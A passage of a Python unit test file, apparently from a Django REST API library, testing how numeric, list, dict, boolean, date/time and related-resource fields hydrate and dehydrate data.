self.assertEqual(field_1.help_text, 'Floating point numeric data. Ex: 26.73')
field_2 = FloatField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = FloatField()
self.assertEqual(field_1.dehydrated_type, 'float')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = FloatField(default=20)
self.assertEqual(field_1.dehydrate(bundle), 20.0)
field_2 = IntegerField(default=18.5)
self.assertEqual(field_2.dehydrate(bundle), 18)
class DecimalFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = DecimalField()
self.assertEqual(field_1.help_text, 'Fixed precision numeric data. Ex: 26.73')
field_2 = DecimalField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = DecimalField()
self.assertEqual(field_1.dehydrated_type, 'decimal')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = DecimalField(default='20')
self.assertEqual(field_1.dehydrate(bundle), Decimal('20.0'))
field_2 = DecimalField(default='18.5')
self.assertEqual(field_2.dehydrate(bundle), Decimal('18.5'))
field_3 = DecimalField(default=21.5)
self.assertEqual(field_3.dehydrate(bundle), Decimal('21.5'))
def test_hydrate(self):
bundle = Bundle(data={
'decimal-y': '18.50',
})
field_1 = DecimalField(default='20')
self.assertEqual(field_1.hydrate(bundle), Decimal('20.0'))
field_2 = DecimalField(default='18.5')
self.assertEqual(field_2.hydrate(bundle), Decimal('18.5'))
bundle = Bundle(data={'foo': '1.5'})
field_3 = DecimalField()
field_3.instance_name = 'foo'
self.assertEqual(field_3.hydrate(bundle), Decimal('1.5'))
bundle = Bundle(data={'foo': 'xxx'})
field_4 = DecimalField(attribute='foo')
field_4.instance_name = 'foo'
self.assertRaises(ApiFieldError, field_4.hydrate, bundle)
def test_model_resource_correct_association(self):
api_field = ModelResource.api_field_from_django_field(models.DecimalField())
self.assertEqual(api_field, DecimalField)
class ListFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = ListField()
self.assertEqual(field_1.help_text, "A list of data. Ex: ['abc', 26.73, 8]")
field_2 = ListField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = ListField()
self.assertEqual(field_1.dehydrated_type, 'list')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = ListField(default=[1, 2, 3])
self.assertEqual(field_1.dehydrate(bundle), [1, 2, 3])
field_2 = ListField(default=['abc'])
self.assertEqual(field_2.dehydrate(bundle), ['abc'])
class DictFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = DictField()
self.assertEqual(field_1.help_text, "A dictionary of data. Ex: {'price': 26.73, 'name': 'Daniel'}")
field_2 = DictField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = DictField()
self.assertEqual(field_1.dehydrated_type, 'dict')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = DictField(default={'price': 12.34, 'name': 'Daniel'})
self.assertEqual(field_1.dehydrate(bundle), {'price': 12.34, 'name': 'Daniel'})
field_2 = DictField(default={'name': 'Daniel'})
self.assertEqual(field_2.dehydrate(bundle), {'name': 'Daniel'})
class BooleanFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = BooleanField()
self.assertEqual(field_1.help_text, 'Boolean data. Ex: True')
field_2 = BooleanField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = BooleanField()
self.assertEqual(field_1.dehydrated_type, 'boolean')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = BooleanField(attribute='is_active', default=False)
self.assertEqual(field_1.dehydrate(bundle), True)
field_2 = BooleanField(default=True)
self.assertEqual(field_2.dehydrate(bundle), True)
class TimeFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = TimeField()
self.assertEqual(field_1.help_text, 'A time as string. Ex: "20:05:23"')
field_2 = TimeField(help_text='Custom.')
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = TimeField()
self.assertEqual(field_1.dehydrated_type, 'time')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = TimeField(attribute='created')
self.assertEqual(field_1.dehydrate(bundle), aware_datetime(2010, 3, 30, 20, 5))
field_2 = TimeField(default=datetime.time(23, 5, 58))
self.assertEqual(field_2.dehydrate(bundle), datetime.time(23, 5, 58))
field_3 = TimeField(attribute='created_string')
note.created_string = '13:06:00'
self.assertEqual(field_3.dehydrate(bundle), datetime.time(13, 6))
note.created_string = '13:37:44'
self.assertEqual(field_3.dehydrate(bundle), datetime.time(13, 37, 44))
note.created_string = 'hello'
self.assertRaises(ApiFieldError, field_3.dehydrate, bundle)
def test_hydrate(self):
bundle_1 = Bundle(data={'time': '03:49'})
field_1 = TimeField(attribute='created')
field_1.instance_name = 'time'
self.assertEqual(field_1.hydrate(bundle_1), datetime.time(3, 49))
bundle_2 = Bundle()
field_2 = TimeField(default=datetime.time(17, 40))
field_2.instance_name = 'doesnotmatter' # Wont find in bundle data
self.assertEqual(field_2.hydrate(bundle_2), datetime.time(17, 40))
bundle_3 = Bundle(data={'time': '22:08:11'})
field_3 = TimeField(attribute='created_string')
field_3.instance_name = 'time'
self.assertEqual(field_3.hydrate(bundle_3), datetime.time(22, 8, 11))
bundle_4 = Bundle(data={'time': '07:45'})
field_4 = TimeField(attribute='created')
field_4.instance_name = 'time'
self.assertEqual(field_4.hydrate(bundle_4), datetime.time(7, 45))
bundle_5 = Bundle(data={'time': None})
field_5 = TimeField(attribute='created', null=True)
field_5.instance_name = 'time'
self.assertEqual(field_5.hydrate(bundle_5), None)
class DateFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = CharField()
self.assertEqual(field_1.help_text, 'Unicode string data. Ex: "Hello World"')
field_2 = CharField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = DateField()
self.assertEqual(field_1.dehydrated_type, 'date')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = DateField(attribute='created')
self.assertEqual(field_1.dehydrate(bundle), aware_datetime(2010, 3, 30, 20, 5))
field_2 = DateField(default=datetime.date(2010, 4, 1))
self.assertEqual(field_2.dehydrate(bundle), datetime.date(2010, 4, 1))
note.created_string = '2010-04-02'
field_3 = DateField(attribute='created_string')
self.assertEqual(field_3.dehydrate(bundle), datetime.date(2010, 4, 2))
def test_hydrate(self):
bundle_1 = Bundle(data={
'date': '2010-05-12',
})
field_1 = DateField(attribute='created')
field_1.instance_name = 'date'
self.assertEqual(field_1.hydrate(bundle_1), datetime.date(2010, 5, 12))
bundle_2 = Bundle()
field_2 = DateField(default=datetime.date(2010, 4, 1))
field_2.instance_name = 'date'
self.assertEqual(field_2.hydrate(bundle_2), datetime.date(2010, 4, 1))
bundle_3 = Bundle(data={
'date': 'Wednesday, May 12, 2010',
})
field_3 = DateField(attribute='created_string')
field_3.instance_name = 'date'
self.assertEqual(field_3.hydrate(bundle_3), datetime.date(2010, 5, 12))
bundle_4 = Bundle(data={
'date': '5 Apr 2010',
})
field_4 = DateField(attribute='created')
field_4.instance_name = 'date'
self.assertEqual(field_4.hydrate(bundle_4), datetime.date(2010, 4, 5))
bundle_5 = Bundle(data={
'date': None,
})
field_5 = DateField(attribute='created', null=True)
field_5.instance_name = 'date'
self.assertEqual(field_5.hydrate(bundle_5), None)
def test_model_resource_correct_association(self):
api_field = ModelResource.api_field_from_django_field(models.DateField())
self.assertEqual(api_field, DateField)
class DateTimeFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = CharField()
self.assertEqual(field_1.help_text, 'Unicode string data. Ex: "Hello World"')
field_2 = CharField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = DateTimeField()
self.assertEqual(field_1.dehydrated_type, 'datetime')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = DateTimeField(attribute='created')
self.assertEqual(field_1.dehydrate(bundle), aware_datetime(2010, 3, 30, 20, 5))
field_2 = DateTimeField(default=aware_datetime(2010, 4, 1, 1, 7))
self.assertEqual(field_2.dehydrate(bundle), aware_datetime(2010, 4, 1, 1, 7))
note.created_string = '2010-04-02 01:11:00'
field_3 = DateTimeField(attribute='created_string')
self.assertEqual(field_3.dehydrate(bundle), aware_datetime(2010, 4, 2, 1, 11))
def test_hydrate(self):
bundle_1 = Bundle(data={
'datetime': '2010-05-12 10:36:28',
})
field_1 = DateTimeField(attribute='created')
field_1.instance_name = 'datetime'
self.assertEqual(field_1.hydrate(bundle_1), aware_datetime(2010, 5, 12, 10, 36, 28))
bundle_2 = Bundle()
field_2 = DateTimeField(default=aware_datetime(2010, 4, 1, 2, 0))
field_2.instance_name = 'datetime'
self.assertEqual(field_2.hydrate(bundle_2), aware_datetime(2010, 4, 1, 2, 0))
bundle_3 = Bundle(data={
'datetime': 'Tue, 30 Mar 2010 20:05:00 -0500',
})
field_3 = DateTimeField(attribute='created_string')
field_3.instance_name = 'datetime'
self.assertEqual(field_3.hydrate(bundle_3), aware_datetime(2010, 3, 30, 20, 5, tzinfo=tzoffset(None, -18000)))
bundle_4 = Bundle(data={
'datetime': None,
})
field_4 = DateField(attribute='created', null=True)
field_4.instance_name = 'datetime'
self.assertEqual(field_4.hydrate(bundle_4), None)
bundle_5 = Bundle(data={'datetime': 'foo'})
field_5 = DateTimeField()
field_5.instance_name = 'datetime'
self.assertRaises(ApiFieldError, field_5.hydrate, bundle_5)
bundle_6 = Bundle(data={'datetime': ['a', 'list', 'used', 'to', 'crash']})
field_6 = DateTimeField()
field_6.instance_name = 'datetime'
self.assertRaises(ApiFieldError, field_6.hydrate, bundle_6)
def test_model_resource_correct_association(self):
api_field = ModelResource.api_field_from_django_field(models.DateTimeField())
self.assertEqual(api_field, DateTimeField)
class UserResource(ModelResource):
class Meta:
resource_name = 'users'
queryset = User.objects.all()
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'):
if bundle_or_obj is None:
return '/api/v1/users/'
return '/api/v1/users/%s/' % bundle_or_obj.obj.id
class ToOneFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = ToOneField(UserResource, 'author')
self.assertEqual(field_1.instance_name, None)
self.assertEqual(issubclass(field_1.to, UserResource), True)
self.assertEqual(field_1.attribute, 'author')
self.assertEqual(field_1.related_name, None)
self.assertEqual(field_1.null, False)
self.assertEqual(field_1.full, False)
self.assertEqual(field_1.readonly, False)
self.assertEqual(field_1.help_text, 'A single related resource. Can be either a URI or set of nested resource data.')
field_2 = ToOneField(UserResource, 'author', null=True, help_text="Points to a User.")
self.assertEqual(field_2.instance_name, None)
self.assertEqual(issubclass(field_2.to, UserResource), True)
self.assertEqual(field_2.attribute, 'author')
self.assertEqual(field_2.related_name, None)
self.assertEqual(field_2.null, True)
self.assertEqual(field_2.full, False)
self.assertEqual(field_2.readonly, False)
self.assertEqual(field_2.help_text, 'Points to a User.')
field_3 = ToOneField(UserResource, 'author', default=1, null=True, help_text="Points to a User.")
self.assertEqual(field_3.instance_name, None)
self.assertEqual(issubclass(field_3.to, UserResource), True)
self.assertEqual(field_3.attribute, 'author')
self.assertEqual(field_3.related_name, None)
self.assertEqual(field_3.null, True)
self.assertEqual(field_3.default, 1)
self.assertEqual(field_3.full, False)
self.assertEqual(field_3.readonly, False)
self.assertEqual(field_3.help_text, 'Points to a User.')
field_4 = ToOneField(UserResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.")
self.assertEqual(field_4.instance_name, None)
self.assertEqual(issubclass(field_4.to, UserResource), True)
self.assertEqual(field_4.attribute, 'author')
self.assertEqual(field_4.related_name, None)
self.assertEqual(field_4.null, True)
self.assertEqual(field_4.default, 1)
self.assertEqual(field_4.full, False)
self.assertEqual(field_4.readonly, True)
self.assertEqual(field_4.help_text, 'Points to a User.')
field_5 = ToOneField(UserResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.", use_in="list")
self.assertEqual(field_5.use_in, 'list')
field_6 = ToOneField(UserResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.", use_in="detail")
self.assertEqual(field_6.use_in, 'detail')
def use_in_callable(x):
return True
field_7 = ToOneField(UserResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.", use_in=use_in_callable)
self.assertTrue(field_7.use_in is use_in_callable)
field_8 = ToOneField(UserResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.", use_in="foo")
self.assertEqual(field_8.use_in, 'all')
def test_dehydrated_type(self):
field_1 = ToOneField(UserResource, 'author')
self.assertEqual(field_1.dehydrated_type, 'related')
def test_has_default(self):
field_1 = ToOneField(UserResource, 'author')
self.assertEqual(field_1.has_default(), False)
field_1 = ToOneField(UserResource, 'author', default=1)
self.assertEqual(field_1.has_default(), True)
def test_default(self):
field_1 = ToOneField(UserResource, 'author')
self.assertTrue(isinstance(field_1.default, NOT_PROVIDED))
field_2 = ToOneField(UserResource, 'author', default=1)
self.assertEqual(field_2.default, 1)
def test_dehydrate(self):
note = Note()
bundle = Bundle(obj=note)
field_1 = ToOneField(UserResource, 'author')
self.assertRaises(ApiFieldError, field_1.dehydrate, bundle)
field_2 = ToOneField(UserResource, 'author', null=True)
self.assertEqual(field_2.dehydrate(bundle), None)
note = Note.objects.get(pk=1)
request = MockRequest()
request.path = "/api/v1/notes/1/"
bundle = Bundle(obj=note, request=request)
field_3 = ToOneField(UserResource, 'author')
self.assertEqual(field_3.dehydrate(bundle), '/api/v1/users/1/')
field_4 = ToOneField(UserResource, 'author', full=True)
user_bundle = field_4.dehydrate(bundle)
self.assertEqual(isinstance(user_bundle, Bundle), True)
self.assertEqual(user_bundle.data['username'], u'johndoe')
self.assertEqual(user_bundle.data['email'], u'john@doe.com')
def test_dehydrate_with_callable(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = ToOneField(UserResource, lambda bundle: User.objects.get(pk=1))
self.assertEqual(field_1.dehydrate(bundle), '/api/v1/users/1/')
field_2 = ToManyField(UserResource, lambda bundle: User.objects.filter(pk=1))
self.assertEqual(field_2.dehydrate(bundle), ['/api/v1/users/1/'])
field_3 = ToOneField(UserResource, lambda bundle: None)
self.assertRaises(ApiFieldError, field_3.dehydrate, bundle)
def test_dehydrate_full_detail_list(self):
note = Note.objects.get(pk=1)
request = MockRequest()
bundle = Bundle(obj=note, request=request)
# details path with full_list=False
request.path = "/api/v1/notes/"
field_1 = ToOneField(UserResource, 'author', full=True, full_list=False)
self.assertEqual(field_1.dehydrate(bundle), '/api/v1/users/1/')
# list path with full_detail=False
request.path = "/api/v1/notes/1/"
field_1 = ToOneField(UserResource, 'author', full=True, full_detail=False)
self.assertEqual(field_1.dehydrate(bundle, for_list=False), '/api/v1/users/1/')
def test_hydrate(self):
note = Note()
bundle = Bundle(obj=note)
# With no value or nullable, we should get an ``ApiFieldError``.
field_1 = ToOneField(UserResource, 'author')
self.assertRaises(ApiFieldError, field_1.hydrate, bundle)
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
# The nullable case.
field_2 = ToOneField(UserResource, 'author', null=True)
field_2.instance_name = 'fk'
bundle.data['fk'] = None
self.assertEqual(field_2.hydrate(bundle), None)
# Wrong resource URI.
field_3 = ToOneField(UserResource, 'author')
field_3.instance_name = 'fk'
bundle.data['fk'] = '/api/v1/users/abc/'
self.assertRaises(NotFound, field_3.hydrate, bundle)
# A real, live attribute!
field_4 = ToOneField(UserResource, 'author')
field_4.instance_name = 'fk'
bundle.data['fk'] = '/api/v1/users/1/'
fk_bundle = field_4.hydrate(bundle)
self.assertEqual(fk_bundle.data['username'], u'johndoe')
self.assertEqual(fk_bundle.data['email'], u'john@doe.com')
self.assertEqual(fk_bundle.obj.username, u'johndoe')
self.assertEqual(fk_bundle.obj.email, u'john@doe.com')
field_5 = ToOneField(UserResource, 'author')
field_5.instance_name = 'fk'
bundle.data['fk'] = {
'username': u'mistersmith',
'email': u'smith@example.com',
'password': u'foobar',
}
fk_bundle = field_5.hydrate(bundle)
self.assertEqual(fk_bundle.data['username'], u'mistersmith')
self.assertEqual(fk_bundle.data['email'], u'smith@example.com')
self.assertEqual(fk_bundle.obj.username, u'mistersmith')
self.assertEqual(fk_bundle.obj.email, u'smith@example.com')
# Regression - Make sure Unicode keys get converted to regular strings
# so that we can **kwargs them.
field_6 = ToOneField(UserResource, 'author')
field_6.instance_name = 'fk'
bundle.data['fk'] = {
u'username': u'mistersmith',
u'email': u'smith@example.com',
u'password': u'foobar',
}
fk_bundle = field_6.hydrate(bundle)
self.assertEqual(fk_bundle.data['username'], u'mistersmith')
self.assertEqual(fk_bundle.data['email'], u'smith@example.com')
self.assertEqual(fk_bundle.obj.username, u'mistersmith')
self.assertEqual(fk_bundle.obj.email, u'smith@example.com')
# Attribute & null regression test.
# First, simulate data missing from the bundle & ``null=True``.
# Use a Note with NO author, so that the lookup for the related
# author fails.
note = Note.objects.create(
title='Biplanes for all!',
slug='biplanes-for-all',
content='Somewhere, east of Manhattan, will lie the mythical land of planes with more one wing...'
)
bundle = Bundle(obj=note)
field_7 = ToOneField(UserResource, 'notinbundle', null=True)
field_7.instance_name = 'notinbundle'
self.assertEqual(field_7.hydrate(bundle), None)
# Then do something in the bundle also with ``null=True``.
field_8 = ToOneField(UserResource, 'author', null=True)
field_8.instance_name = 'author'
fk_bundle = field_8.hydrate(bundle)
self.assertEqual(field_8.hydrate(bundle), None)
# Then use an unsaved object in the bundle also with ``null=True``.
field_9 = ToOneField(UserResource, 'author', null=True)
field_9.instance_name = 'author'
self.assertEqual(field_9.hydrate(bundle), None)
# The blank case.
field_10 = ToOneField(UserResource, 'fk', blank=True)
field_10.instance_name = 'fk'
self.assertEqual(field_10.hydrate(bundle), None)
bundle.data['author'] = '/api/v1/users/1/'
field_11 = ToOneField(UserResource, 'author', blank=True)
field_11.instance_name = 'author'
fk_bundle = field_11.hydrate(bundle)
self.assertEqual(fk_bundle.obj.username, 'johndoe')
# The readonly case.
field_12 = ToOneField(UserResource, 'author', readonly=True)
field_12.instance_name = 'author'
self.assertEqual(field_12.hydrate(bundle), None)
# A related object.
field_13 = ToOneField(UserResource, 'author')
field_13.instance_name = 'fk'
bundle.related_obj = User.objects.get(pk=1)
bundle.related_name = 'author'
fk_bundle = field_13.hydrate(bundle)
self.assertEqual(fk_bundle.obj.username, u'johndoe')
self.assertEqual(fk_bundle.obj.email, u'john@doe.com')
def test_resource_from_uri(self):
ur = UserResource()
field_1 = ToOneField(UserResource, 'author')
fk_bundle = field_1.resource_from_uri(ur, '/api/v1/users/1/')
self.assertEqual(fk_bundle.data['username'], u'johndoe')
self.assertEqual(fk_bundle.data['email'], u'john@doe.com')
self.assertEqual(fk_bundle.obj.username, u'johndoe')
self.assertEqual(fk_bundle.obj.email, u'john@doe.com')
fk_bundle = field_1.resource_from_uri(ur, '/api/v1/users/1/', related_obj='Foo', related_name='Bar')
self.assertEqual(fk_bundle.related_obj, None)
self.assertEqual(fk_bundle.related_name, None)
def test_resource_from_data(self):
ur = UserResource()
field_1 = ToOneField(UserResource, 'author')
fk_bundle = field_1.resource_from_data(ur, {
'username': u'mistersmith',
'email': u'smith@example.com',
'password': u'foobar',
})
self.assertEqual(fk_bundle.data['username'], u'mistersmith')
self.assertEqual(fk_bundle.data['email'], u'smith@example.com')
self.assertEqual(fk_bundle.obj.username, u'mistersmith')
self.assertEqual(fk_bundle.obj.email, u'smith@example.com')
fk_bundle = field_1.resource_from_data(ur, {
'username': u'mistersmith',
'email': u'smith@example.com',
'password': u'foobar',
}, related_obj='Foo', related_name='Bar')
self.assertEqual(fk_bundle.related_obj, 'Foo')
self.assertEqual(fk_bundle.related_name, 'Bar')
def test_resource_from_pk(self):
user = User.objects.get(pk=1)
ur = UserResource()
field_1 = ToOneField(UserResource, 'author')
fk_bundle = field_1.resource_from_pk(ur, user)
self.assertEqual(fk_bundle.data['username'], u'johndoe')
self.assertEqual(fk_bundle.data['email'], u'john@doe.com')
self.assertEqual(fk_bundle.obj.username, u'johndoe')
self.assertEqual(fk_bundle.obj.email, u'john@doe.com')
fk_bundle = field_1.resource_from_pk(ur, user, related_obj='Foo', related_name='Bar')
self.assertEqual(fk_bundle.related_obj, None)
self.assertEqual(fk_bundle.related_name, None)
def test_traversed_attribute_dehydrate(self):
user = User.objects.get(pk=1)
note = Note.objects.create(author=user)
mediabit = MediaBit(note=note)
bundle = Bundle(obj=mediabit)
field_1 = ToOneField(UserResource, 'note__author')
field_1.instance_name = 'fk'
self.assertEqual(field_1.dehydrate(bundle), '/api/v1/users/1/')
field_2 = ToOneField(UserResource, 'fakefield__author')
field_2.instance_name = 'fk'
self.assertRaises(ApiFieldError, field_2.hydrate, bundle)
class SubjectResource(ModelResource):
class Meta:
resource_name = 'subjects'
queryset = Subject.objects.all()
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'):
if bundle_or_obj is None:
return '/api/v1/subjects/'
return '/api/v1/subjects/%s/' % bundle_or_obj.obj.id
class MediaBitResource(ModelResource):
class Meta:
resource_name = 'mediabits'
queryset = MediaBit.objects.all()
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'):
if bundle_or_obj is None:
return '/api/v1/mediabits/'
return '/api/v1/mediabits/%s/' % bundle_or_obj.obj.id
class ToManyFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
urls = 'core.tests.field_urls'
def setUp(self):
self.note_1 = Note.objects.get(pk=1)
self.note_2 = Note.objects.get(pk=2)
self.note_3 = Note.objects.get(pk=3)
self.subject_1 = Subject.objects.create(
name='News',
url='/news/'
)
self.subject_2 = Subject.objects.create(
name='Photos',
url='/photos/'
)
self.subject_3 = Subject.objects.create(
name='Personal Interest',
url='/news/personal-interest/'
)
self.note_1.subjects.add(self.subject_1)
self.note_1.subjects.add(self.subject_2)
self.note_2.subjects.add(self.subject_1)
self.note_2.subjects.add(self.subject_3)
def test_init(self):
field_1 = ToManyField(SubjectResource, 'subjects')
self.assertEqual(field_1.instance_name, None)
self.assertEqual(issubclass(field_1.to, SubjectResource), True)
self.assertEqual(field_1.attribute, 'subjects')
self.assertEqual(field_1.related_name, None)
self.assertEqual(field_1.null, False)
self.assertEqual(field_1.full, False)
self.assertEqual(field_1.readonly, False)
self.assertEqual(field_1.help_text, 'Many related resources. Can be either a list of URIs or list of individually nested resource data.')
field_2 = ToManyField(SubjectResource, 'subjects', null=True, help_text='Points to many Subjects.')
self.assertEqual(field_2.instance_name, None)
self.assertEqual(issubclass(field_2.to, SubjectResource), True)
self.assertEqual(field_2.attribute, 'subjects')
self.assertEqual(field_2.related_name, None)
self.assertEqual(field_2.null, True)
self.assertEqual(field_2.full, False)
self.assertEqual(field_2.readonly, False)
self.assertEqual(field_2.help_text, 'Points to many Subjects.')
field_3 = ToManyField(SubjectResource, 'subjects', default=1, null=True, help_text='Points to many Subjects.')
self.assertEqual(field_3.instance_name, None)
self.assertEqual(issubclass(field_3.to, SubjectResource), True)
self.assertEqual(field_3.attribute, 'subjects')
self.assertEqual(field_3.related_name, None)
self.assertEqual(field_3.null, True)
self.assertEqual(field_3.default, 1)
self.assertEqual(field_3.full, False)
self.assertEqual(field_3.readonly, False)
self.assertEqual(field_3.help_text, 'Points to many Subjects.')
field_4 = ToManyField(SubjectResource, 'subjects', default=1, null=True, readonly=True, help_text='Points to many Subjects.')
self.assertEqual(field_4.instance_name, None)
self.assertEqual(issubclass(field_4.to, SubjectResource), True)
self.assertEqual(field_4.attribute, 'subjects')
self.assertEqual(field_4.related_name, None)
self.assertEqual(field_4.null, True)
self.assertEqual(field_4.default, 1)
self.assertEqual(field_4.full, False)
self.assertEqual(field_4.readonly, True)
self.assertEqual(field_4.help_text, 'Points to many Subjects.')
field_5 = ToManyField(SubjectResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.", use_in="list")
self.assertEqual(field_5.use_in, 'list')
field_6 = ToManyField(SubjectResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.", use_in="detail")
self.assertEqual(field_6.use_in, 'detail')
def use_in_callable(x):
return True
field_7 = ToManyField(SubjectResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.", use_in=use_in_callable)
self.assertTrue(field_7.use_in is use_in_callable)
field_8 = ToManyField(SubjectResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.", use_in="foo")
self.assertEqual(field_8.use_in, 'all')
def test_dehydrated_type(self):
field_1 = ToManyField(SubjectResource, 'subjects')
self.assertEqual(field_1.dehydrated_type, 'related')
def test_has_default(self):
field_1 = ToManyField(SubjectResource, 'subjects')
self.assertEqual(field_1.has_default(), False)
field_2 = ToManyField(SubjectResource, 'subjects', default=1)
self.assertEqual(field_2.has_default(), True)
def test_default(self):
field_1 = ToManyField(SubjectResource, 'subjects')
self.assertTrue(isinstance(field_1.default, NOT_PROVIDED))
field_2 = ToManyField(SubjectResource, 'subjects', default=1)
self.assertEqual(field_2.default, 1)
def test_dehydrate(self):
note = Note()
bundle_1 = Bundle(obj=note)
field_1 = ToManyField(SubjectResource, 'subjects')
field_1.instance_name = 'm2m'
with self.assertRaises(ApiFieldError):
field_1.dehydrate(bundle_1)
field_2 = ToManyField(SubjectResource, 'subjects', null=True)
field_2.instance_name = 'm2m'
self.assertEqual(field_2.dehydrate(bundle_1), [])
field_3 = ToManyField(SubjectResource, 'subjects')
field_3.instance_name = 'm2m'
bundle_3 = Bundle(obj=self.note_1)
self.assertEqual(field_3.dehydrate(bundle_3), ['/api/v1/subjects/1/', '/api/v1/subjects/2/'])
field_4 = ToManyField(SubjectResource, 'subjects', full=True)
field_4.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/%(pk)s/" % {'pk': self.note_1.pk}
bundle_4 = Bundle(obj=self.note_1, request=request)
subject_bundle_list = field_4.dehydrate(bundle_4)
self.assertEqual(len(subject_bundle_list), 2)
self.assertEqual(isinstance(subject_bundle_list[0], Bundle), True)
self.assertEqual(subject_bundle_list[0].data['name'], u'News')
self.assertEqual(subject_bundle_list[0].data['url'], u'/news/')
self.assertEqual(subject_bundle_list[0].obj.name, u'News')
self.assertEqual(subject_bundle_list[0].obj.url, u'/news/')
self.assertEqual(isinstance(subject_bundle_list[1], Bundle), True)
self.assertEqual(subject_bundle_list[1].data['name'], u'Photos')
self.assertEqual(subject_bundle_list[1].data['url'], u'/photos/')
self.assertEqual(subject_bundle_list[1].obj.name, u'Photos')
self.assertEqual(subject_bundle_list[1].obj.url, u'/photos/')
field_5 = ToManyField(SubjectResource, 'subjects')
field_5.instance_name = 'm2m'
bundle_5 = Bundle(obj=self.note_2)
self.assertEqual(field_5.dehydrate(bundle_5), ['/api/v1/subjects/1/', '/api/v1/subjects/3/'])
field_6 = ToManyField(SubjectResource, 'subjects')
field_6.instance_name = 'm2m'
bundle_6 = Bundle(obj=self.note_3)
self.assertEqual(field_6.dehydrate(bundle_6), [])
# Regression for missing variable initialization.
field_7 = ToManyField(SubjectResource, None)
field_7.instance_name = 'm2m'
bundle_7 = Bundle(obj=self.note_3)
with self.assertRaises(ApiFieldError):
# ToManyField requires an attribute of some type.
field_7.dehydrate(bundle_7)
def test_dehydrate_full_detail_list(self):
# details path with full_detail=False
field_1 = ToManyField(SubjectResource, 'subjects', full=True, full_detail=False)
field_1.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/%(pk)s/" % {'pk': self.note_1.pk}
bundle_1 = Bundle(obj=self.note_1, request=request)
self.assertEqual(field_1.dehydrate(bundle_1, for_list=False), ['/api/v1/subjects/1/', '/api/v1/subjects/2/'])
# list path with full_detail=False
field_2 = ToManyField(SubjectResource, 'subjects', full=True, full_detail=False)
field_2.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/"
bundle_2 = Bundle(obj=self.note_1, request=request)
subject_bundle_list = field_2.dehydrate(bundle_2)
self.assertEqual(len(subject_bundle_list), 2)
self.assertEqual(isinstance(subject_bundle_list[0], Bundle), True)
self.assertEqual(subject_bundle_list[0].data['name'], u'News')
self.assertEqual(subject_bundle_list[0].data['url'], u'/news/')
self.assertEqual(subject_bundle_list[0].obj.name, u'News')
self.assertEqual(subject_bundle_list[0].obj.url, u'/news/')
self.assertEqual(isinstance(subject_bundle_list[1], Bundle), True)
self.assertEqual(subject_bundle_list[1].data['name'], u'Photos')
self.assertEqual(subject_bundle_list[1].data['url'], u'/photos/')
self.assertEqual(subject_bundle_list[1].obj.name, u'Photos')
self.assertEqual(subject_bundle_list[1].obj.url, u'/photos/')
# list path with full_list=False
field_3 = ToManyField(SubjectResource, 'subjects', full=True, full_list=False)
field_3.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/"
bundle_3 = Bundle(obj=self.note_1, request=request)
self.assertEqual(field_3.dehydrate(bundle_3), ['/api/v1/subjects/1/', '/api/v1/subjects/2/'])
# detail path with full_list=False
field_4 = ToManyField(SubjectResource, 'subjects', full=True, full_list=False)
field_4.instance_name = 'm2m'
request = MockRequest()
request.path = "/api/v1/subjects/%(pk)s/" % {'pk': self.note_1.pk}
bundle_4 = Bundle(obj=self.note_1, request=request)
subject_bundle_list = field_4.dehydrate(bundle_4, for_list=False)
self.assertEqual(len(subject_bundle_list), 2)
